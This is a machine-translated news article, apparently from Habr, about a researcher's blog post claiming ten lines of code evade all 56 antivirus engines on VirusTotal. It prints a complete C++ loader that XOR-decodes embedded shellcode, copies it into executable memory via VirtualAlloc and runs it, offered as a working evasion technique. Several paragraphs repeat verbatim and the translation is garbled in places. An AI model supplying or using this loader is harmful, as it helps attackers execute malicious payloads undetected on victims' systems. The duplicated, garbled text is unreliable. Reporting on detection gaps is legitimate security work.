We go around the antivirus with ten lines of code
The information security specialist under the nickname evasiv3 published last week an entry in his blog that tells how you can work around any antivirus with ten lines of code.
Initially, Evasiv3 planned to write a huge post about ways to bypass anti-virus protection, however, after testing the first step of its “manual”, he was very surprised: none of the 56 products tested, designed to ensure the safety of the user on the network, did not find his binary.
In his work, evasiv3 used Veil-Evasion , part of the Veil-Framework . The author marks him as "an excellent tool that almost never let him down."
')
The code presented below is written in C ++ and is focused on the attack, first of all, of the windows-platform:
The above code creates an array of characters with a shell code, performs an XOR operation with an incredibly complex key "x" in lower case, allocates some memory, copies the array into it, and then executes it.
If you now think "oh well!", Then you have the same reaction as that of Evasiv. The fact that the binary was detected by 0 of the antiviruses out of 56 after checking it through VirusTotal adds fuel to the fire. The AV bypass shown above shows that the simplest and most basic penetration method is still working.
Of course, most antiviruses are focused on curbing the exploitation of vulnerabilities, and not on identifying them, so it’s too early to “bury” them.
The screenshot at the beginning of the article shows the date for 2015, however, the author of the code rechecked the VirusTotal binary before publishing it on his blog . The result is the same: 0 out of 56.
Initially, Evasiv3 planned to write a huge post about ways to bypass anti-virus protection, however, after testing the first step of its “manual”, he was very surprised: none of the 56 products tested, designed to ensure the safety of the user on the network, did not find his binary.
After obtaining a similar result, I decided to abandon my idea of ​​a long and exhausting round of anti-virus protection and act quickly, “dirty”, but it is incredibly simple.
In his work, evasiv3 used Veil-Evasion , part of the Veil-Framework . The author marks him as "an excellent tool that almost never let him down."
')
The code presented below is written in C ++ and is focused on the attack, first of all, of the windows-platform:
#include <windows.h> #include <iostream> int main(int argc, char **argv) { char b[] = {/* your XORd with key of 'x' shellcode goes here ie 0x4C,0x4F, 0x4C */}; char c[sizeof b]; for (int i = 0; i < sizeof b; i++) {c[i] = b[i] ^ 'x';} void *exec = VirtualAlloc(0, sizeof c, MEM_COMMIT, PAGE_EXECUTE_READWRITE); memcpy(exec, c, sizeof c); ((void(*)())exec)(); } The above code creates an array of characters with a shell code, performs an XOR operation with an incredibly complex key "x" in lower case, allocates some memory, copies the array into it, and then executes it.
If you now think "oh well!", Then you have the same reaction as that of Evasiv. The fact that the binary was detected by 0 of the antiviruses out of 56 after checking it through VirusTotal adds fuel to the fire. The AV bypass shown above shows that the simplest and most basic penetration method is still working.
Of course, most antiviruses are focused on curbing the exploitation of vulnerabilities, and not on identifying them, so it’s too early to “bury” them.
The screenshot at the beginning of the article shows the date for 2015, however, the author of the code rechecked the VirusTotal binary before publishing it on his blog . The result is the same: 0 out of 56.
Source: https://habr.com/ru/post/279791/
All Articles